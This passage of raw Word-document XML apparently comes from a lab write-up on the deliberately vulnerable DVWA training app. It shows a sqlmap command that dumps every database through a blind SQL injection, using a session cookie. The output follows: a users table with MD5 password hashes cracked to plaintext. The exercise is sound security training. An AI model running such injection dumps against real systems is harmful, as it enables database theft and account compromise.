                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">sqlmap -u "http://10.114.186.145/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit" \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  --cookie="PHPSESSID=tqg2sm7p30bqvoo3pr70ov8v84; security=low" \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  --batch --dump-all --exclude-sysdbs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2AA55" w:sz="8"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F7F7F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Database: dvwa  Table: guestbook  [1 entry]</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comment_id | name   | comment                 |</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1          | test   | This is a test comment. |</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w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Database: dvwa  Table: users  [5 entries]</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user_id | user    | avatar                      | password                                    | last_name | first_name | last_login          | failed_login |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">+---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| 3       | 1337    | /hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2018-10-03 22:09:36 | 0            |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| 1       | admin   | /hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2018-10-03 22:09:36 | 0            |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| 2       | gordonb | /hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2018-10-03 22:09:36 | 0            |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| 4       | pablo   | /hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2018-10-03 22:09:36 | 0            |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| 5       | smithy  | /hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2018-10-03 22:09:36 | 0            |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>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12386dc94f790b3b2a80af8b51e0c1212fd0cc.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/039e1d633572a0df943ea966eee0411382e7ede7.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/42a8e144790471817cf8923d34873cc37e7c32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2026-06-24T23:21:24.833Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-24T23:21:24.833Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>